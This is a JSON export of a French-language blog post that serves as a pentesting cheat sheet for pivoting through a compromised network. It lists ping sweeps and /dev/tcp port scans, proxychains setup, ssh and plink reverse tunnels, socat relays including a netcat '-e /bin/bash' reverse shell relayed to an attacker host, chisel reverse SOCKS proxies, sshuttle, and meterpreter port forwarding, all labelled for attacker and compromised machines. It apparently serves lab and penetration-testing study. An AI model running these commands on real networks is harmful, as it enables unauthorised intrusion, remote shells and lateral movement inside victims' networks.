{"id":601,"date":"2021-07-22T07:00:10","date_gmt":"2021-07-22T12:00:10","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=601"},"modified":"2022-04-27T07:50:35","modified_gmt":"2022-04-27T12:50:35","slug":"pivot-avec-ssh-plink-socat-chisel-ou-sshuttle","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/","title":{"rendered":"Pivot avec ssh, plink, socat, chisel ou sshuttle"},"content":{"rendered":"

Pivoter<\/p>\n

Enumeration des h\u00f4tes actifs<\/strong><\/p>\n

\n.\/nmap -sn 10.x.x.1-255 -oN scan-USERNAME\nfor i in {1..255}; do (ping -c 1 172.16.0.${i} | grep "bytes from" &); done #alternative<\/code><\/pre><\/p>\n
D\u00e9termination des ports actifs sur un h\u00f4tes<\/strong><\/p>\n
for i in {1..65535}; do (echo > \/dev\/tcp\/192.168.1.1\/$i) >\/dev\/null 2>&1 && echo $i is open; done<\/code><\/p>\n
Configuration de proxychains<\/strong><\/p>\n
Les fichiers de configuration de proxychains
\n.\/proxychains.conf
\n~\/.proxychains\/proxychains.conf
\n\/etc\/proxychains.conf<\/p>\n
ajouter dans la section [ProxyList]
\nsocks4 127.0.0.1 8080 #ou socks5 pour chisel par exemple<\/code><\/p>\n
ssh<\/strong><\/p>\n
ssh forward connections<\/p>\n
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN\nssh -D 1337 user@172.16.0.5 -fN #proxy<\/code><\/pre><\/p>\n
ssh reverse connections<\/p>\n
ssh-keygen
\ncopier la cl\u00e9 publique dans le fichier authorized_keys sur l’ordinateur de l’attaquant. ajouter command=”echo ‘This account can only be used for port forwarding'”,no-agent-forwarding,no-x11-forwarding,no-pty devant la cl\u00e9 dans ce fichier
\n
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN\nssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN #reverse proxy. possible dans les versions r\u00e9centes<\/code><\/pre><\/p>\n
Plink.exe (ssh n’est pas disponible dans les versions anciennes de Windows)<\/strong>
\nLes cl\u00e9s cr\u00e9\u00e9s avec ssh-keygen doivent \u00eatre convertis avec puttygen
\nPossible de t\u00e9l\u00e9charger une copie sur https:\/\/www.chiark.greenend.org.uk\/~sgtatham\/putty\/latest.html ou \/usr\/share\/windows-resources\/binaries\/plink.exe sur kali
\n
cmd.exe \/c echo y | .\\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N\nsudo apt install putty-tools\nputtygen KEYFILE -o OUTPUT_KEY.ppk<\/code><\/pre><\/p>\n
socat <\/strong><\/p>\n
Reverse relay
\n
.\/socat tcp-l:8000 172.16.0.200:443 \n.\/nc 127.0.0.1 8000 -e \/bin\/bash<\/code><\/pre><\/p>\n
Port forwarding (easy)
\n.\/socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &<\/code><\/p>\n
Port forwarding (quiet). Il n’y a pas de ports ouvert sur la machine compromise
\n
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & #machine de l'attaquant\n.\/socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork & #serveur compromis<\/code><\/pre><\/p>\n
Nous pouvons maintenant visiter le site \u00e0 l’adresse http:\/\/localhost:8000<\/p>\n
Chisel<\/strong><\/p>\n
Reverse SOCKS Proxy
\n
.\/chisel server -p LISTEN_PORT --reverse & #machine de l'attaquant\n.\/chisel client ATTACKING_IP:LISTEN_PORT R:socks & #serveur compromis<\/code><\/pre><\/p>\n
Forward SOCKS Proxy
\n
.\/chisel server -p LISTEN_PORT --socks5 #serveur compromis\n.\/chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks #attaquant<\/code><\/pre><\/p>\n
Remote Port Forward
\n
.\/chisel server -p LISTEN_PORT --reverse & #attaquant\n.\/chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT & #serveur compromis<\/code><\/pre><\/p>\n
Local Port Forward
\n
.\/chisel server -p LISTEN_PORT #serveur compromis\n.\/chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT #attaquant<\/code><\/pre><\/p>\n
Sshuttle<\/strong>
\n
sudo apt install sshuttle\nsshuttle -r user@172.16.0.5 172.16.0.0\/24 #acc\u00e8s au r\u00e9seau 172.16.0.0 sur l'ordinateur de l'attaquant\nsshuttle -r username@address -N #acc\u00e8s aux r\u00e9seaux du serveur comprimis en regardant ses tables de routage\nsshuttle -r user@172.16.0.5 --ssh-cmd "ssh -i private_key" 172.16.0.0\/24 #connexion avec une cl\u00e9 ssh\nshuttle -x 172.16.0.100 -r user@172.16.0.100 172.16.0.0\/24 #le serveur fait partie du r\u00e9seau que l'on veut avoir acc\u00e8s<\/code><\/pre><\/p>\n
meterpreter port forwarding
\nportfwd add -l 8081 -p 8080 -r 127.0.0.1<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"
Pivoter Enumeration des h\u00f4tes actifs .\/nmap -sn 10.x.x.1-255 -oN scan-USERNAME for i in {1..255}; do (ping -c 1 172.16.0.${i} | grep "bytes from" &); done #alternative D\u00e9termination des ports actifs sur un h\u00f4tes for i in {1..65535}; do (echo > \/dev\/tcp\/192.168.1.1\/$i) >\/dev\/null 2>&1 && echo $i is open; done Configuration de proxychains Les fichiers de configuration de proxychains .\/proxychains.conf ~\/.proxychains\/proxychains.conf \/etc\/proxychains.conf ajouter dans la section  socks4 127.0.0.1 8080 #ou socks5 pour chisel par exemple ssh ssh forward connections ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN ssh -D 1337 user@172.16.0.5 -fN #proxy ssh reverse connections ssh-keygen copier la cl\u00e9 publique dans le <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"yoast_head":"\nPivot avec ssh, plink, socat, chisel ou sshuttle - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pivot avec ssh, plink, socat, chisel ou sshuttle - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Pivoter Enumeration des h\u00f4tes actifs .\/nmap -sn 10.x.x.1-255 -oN scan-USERNAME for i in {1..255}; do (ping -c 1 172.16.0.${i} | grep "bytes from" &); done #alternative D\u00e9termination des ports actifs sur un h\u00f4tes for i in {1..65535}; do (echo > \/dev\/tcp\/192.168.1.1\/$i) >\/dev\/null 2>&1 && echo $i is open; done Configuration de proxychains Les fichiers de configuration de proxychains .\/proxychains.conf ~\/.proxychains\/proxychains.conf \/etc\/proxychains.conf ajouter dans la section socks4 127.0.0.1 8080 #ou socks5 pour chisel par exemple ssh ssh forward connections ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN ssh -D 1337 user@172.16.0.5 -fN #proxy ssh reverse connections ssh-keygen copier la cl\u00e9 publique dans le\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-22T12:00:10+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-04-27T12:50:35+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/\",\"name\":\"Pivot avec ssh, plink, socat, chisel ou sshuttle - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-07-22T12:00:10+00:00\",\"dateModified\":\"2022-04-27T12:50:35+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pivot avec ssh, plink, socat, chisel ou sshuttle\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pivot avec ssh, plink, socat, chisel ou sshuttle - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/","og_locale":"fr_CA","og_type":"article","og_title":"Pivot avec ssh, plink, socat, chisel ou sshuttle - S\u00e9curiser votre site","og_description":"Pivoter Enumeration des h\u00f4tes actifs .\/nmap -sn 10.x.x.1-255 -oN scan-USERNAME for i in {1..255}; do (ping -c 1 172.16.0.${i} | grep "bytes from" &); done #alternative D\u00e9termination des ports actifs sur un h\u00f4tes for i in {1..65535}; do (echo > \/dev\/tcp\/192.168.1.1\/$i) >\/dev\/null 2>&1 && echo $i is open; done Configuration de proxychains Les fichiers de configuration de proxychains .\/proxychains.conf ~\/.proxychains\/proxychains.conf \/etc\/proxychains.conf ajouter dans la section socks4 127.0.0.1 8080 #ou socks5 pour chisel par exemple ssh ssh forward connections ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN ssh -D 1337 user@172.16.0.5 -fN #proxy ssh reverse connections ssh-keygen copier la cl\u00e9 publique dans le","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-07-22T12:00:10+00:00","article_modified_time":"2022-04-27T12:50:35+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/","name":"Pivot avec ssh, plink, socat, chisel ou sshuttle - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-07-22T12:00:10+00:00","dateModified":"2022-04-27T12:50:35+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/pivot-avec-ssh-plink-socat-chisel-ou-sshuttle\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Pivot avec ssh, plink, socat, chisel ou sshuttle"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/601"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=601"}],"version-history":[{"count":5,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/601\/revisions"}],"predecessor-version":[{"id":628,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/601\/revisions\/628"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=601"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=601"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=601"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}